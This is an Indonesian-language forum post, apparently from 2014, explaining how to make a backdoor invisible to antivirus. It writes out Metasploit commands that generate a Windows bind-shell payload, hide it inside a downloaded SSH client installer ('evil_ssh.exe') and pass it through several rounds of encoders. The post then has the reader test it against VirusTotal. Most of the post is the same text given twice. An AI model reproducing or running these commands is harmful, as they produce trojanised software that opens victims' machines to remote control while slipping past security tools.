08-15-2014, 04:17 PM
Oke kali ini saya akan jelaskan bagaimana membypass backdoor dari semua antivirus.
Tujuan :
Antivirus melindungi mesin dari malware tetapi tidak semuanya dengan cara untuk mengemas malware untuk membuat lebih sulit untuk dideteksi, dengan menggunakan metasploit untuk membuat malware sama sekali tak terlihat untuk antivirus.
Jalankan service postgresql dan metasploit
Creating Listener
Di folder /root akan tersimpan listen.exe
Encoding Listener
Di folder /root akan tersimpan evil_ssh.exe
Di folder /root akan tersimpan listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe
Setelah itu scan backdoor yang sudah kita buat di :
https://www.virustotal.com
Hasilnya :
Terima Kasih.
Maaf kalo repost.
Tujuan :
Antivirus melindungi mesin dari malware tetapi tidak semuanya dengan cara untuk mengemas malware untuk membuat lebih sulit untuk dideteksi, dengan menggunakan metasploit untuk membuat malware sama sekali tak terlihat untuk antivirus.
Jalankan service postgresql dan metasploit
Code:
service postgresql start
service metasploit start
Creating Listener
Code:
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
Di folder /root akan tersimpan listen.exe
Encoding Listener
Code:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
Di folder /root akan tersimpan evil_ssh.exe
Code:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
Di folder /root akan tersimpan listen.exe, evil_ssh.exe, listen2.exe, listen3.exe, listen4.exe, listen5.exe
Setelah itu scan backdoor yang sudah kita buat di :
https://www.virustotal.com
Hasilnya :
Terima Kasih.
Maaf kalo repost.
DO YOU KNOW ME...???
YES I AM CLOUDNINE
YES I AM CLOUDNINE
JUST pengguna baru ON CYBER WORLD